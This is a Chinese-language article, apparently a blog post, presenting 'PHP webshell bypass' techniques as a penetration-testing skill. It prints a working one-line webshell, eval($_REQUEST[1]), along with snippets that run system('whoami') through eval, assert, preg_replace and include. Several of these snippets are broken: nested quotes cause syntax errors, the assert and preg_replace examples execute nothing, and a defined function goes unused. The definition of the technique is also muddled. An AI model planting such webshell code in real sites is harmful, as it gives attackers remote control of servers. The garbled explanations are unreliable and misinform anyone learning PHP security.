攻破Webshell，强势揭秘PHP绕过之路

PHP Webshell绕过：突破Webshell防线，掌握渗透测试利器

什么是Webshell绕过？

Webshell绕过是一种渗透测试技术，攻击者利用它绕过Webshell的防御机制，获取目标服务器的控制权。Webshell是一种恶意脚本，允许攻击者远程控制受感染的服务器。绕过Webshell至关重要，因为它使攻击者能够进一步窃取敏感信息或发动攻击。

用户自定义函数绕过

PHP提供了一种创建用户自定义函数的功能，攻击者可以利用这一点来执行任意代码。例如，一个名为a()的函数可以接受一个数组作为参数，然后执行该数组中的代码。通过将$_REQUEST数组作为参数传递给a()函数，攻击者可以远程执行代码。

function a($a) {
  return $a;
}

eval($_REQUEST[1]);
?>

eval()函数绕过

eval()函数允许将字符串作为代码执行。攻击者可以将任意代码存储在字符串中，然后使用eval()函数执行它。例如，攻击者可以存储以下代码：

<?php
system("whoami");
?>

并使用eval()函数执行它，获取目标服务器的当前用户。

$code = "<?php system("whoami"); ?>";
eval($code);
?>

assert()函数绕过

assert()函数根据布尔表达式执行代码。攻击者可以通过提供一个永远为真的布尔表达式，并将其作为assert()函数的第一个参数来执行任意代码。然后，他们可以在第二个参数中存储任意代码。

assert("1==1");
?>

preg_replace()函数绕过

preg_replace()函数允许根据正则表达式替换字符串中的部分内容。攻击者可以利用它将任意代码存储在第二个参数中，并提供一个正则表达式作为第一个参数，该正则表达式将匹配整个字符串。

$code = "<?php system("whoami"); ?>";
$pattern = "/^/s";
$replacement = $code;
preg_replace($pattern, $replacement, "");
?>

include()函数绕过

include()函数包含外部文件。攻击者可以通过将任意代码存储在外部文件中，然后使用include()函数包含它来执行代码。

$code = "<?php system("whoami"); ?>";
file_put_contents("shell.php", $code);
include("shell.php");
?>

常见问题解答

• 什么是Webshell绕过？
  Webshell绕过是一种渗透测试技术，攻击者利用它绕过Webshell的防御机制，获取目标服务器的控制权。

• 为什么需要绕过Webshell？
  绕过Webshell至关重要，因为它允许攻击者进一步窃取敏感信息或发动攻击。

• 哪些PHP函数可用于绕过Webshell？
  用户自定义函数、eval()、assert()、preg_replace()和include()。

• 如何预防Webshell绕过？
  使用Web应用程序防火墙（WAF）、补丁服务器和扫描Webshell。

• 如何检测Webshell绕过？
  监控Web服务器活动，寻找可疑的请求或脚本执行。

结论

Webshell绕过是一项重要的渗透测试技术，使攻击者能够获取目标服务器的控制权。了解并掌握本文中介绍的绕过方法对于渗透测试人员和系统管理员来说至关重要，以保护Web应用程序和服务器免受攻击。